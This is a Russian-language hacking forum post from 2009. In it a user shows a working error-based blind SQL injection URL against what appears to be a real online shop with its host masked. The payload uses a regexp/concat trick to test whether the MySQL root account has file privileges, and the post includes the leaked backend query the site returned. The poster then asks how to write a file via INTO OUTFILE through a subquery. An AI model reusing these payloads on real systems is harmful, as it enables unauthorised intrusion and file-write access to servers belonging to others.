29.09.2009, 14:08
|
|
Новичок
Регистрация: 03.08.2009
Сообщений: 7
С нами:
8827380
Репутация:
0
|
|
Сообщение от warlok
paypoker можно через into outfile при соответсвующих правах
http://xxx/xxx?id=48535'/**/and%22x%22/**/regexp/**/concat(%22x{1,25%22,/**/if(substring((SELECT/**/file_priv/**/FROM/**/mysql.user%20WHERE/**/user/**/=/**/'root'),1,1)/**/=/**/'Y',/**/(select/**/1/**/union/**/select/**/2),/**/%226}%22))/**/and/**/1='1
Subquery returns more than 1 row. т.е. права есть
Код:
select product_list.id, product_manufacturers.manname, product_list.manpart, product_list.descr, product_list.upccode, product_list.platform, product_list.sku, product_list.subsku, product_prices.price_msrp, product_prices.price_level1, product_list.refurb, product_list.demo, product_prices.instock, product_list.dropship as dship, product_list.visible from product_list, product_manufacturers, product_prices, site_skus where product_prices.price_level1 > 0 AND product_list.id = '48535'/**/and"x"/**/regexp/**/concat("x{1,25",/**/if(MID((SELECT file_priv FROM mysql.user WHERE user = 'root'),1,1) = 'Y',/**/(select/**/1/**/union/**/select/**/2),/**/"6}")) and 1='1' and product_list.kit = '0' AND product_list.manid = product_manufacturers.manid and site_skus.pid = product_list.id and site_skus.divid = '0' and product_list.id = product_prices.id group by product_list.id
собственно как? обрубать запрос нельзя обрубалки не работают 
нужно сделать через подзапрос
Последний раз редактировалось paypoker; 29.09.2009 в 14:14..
|
|
|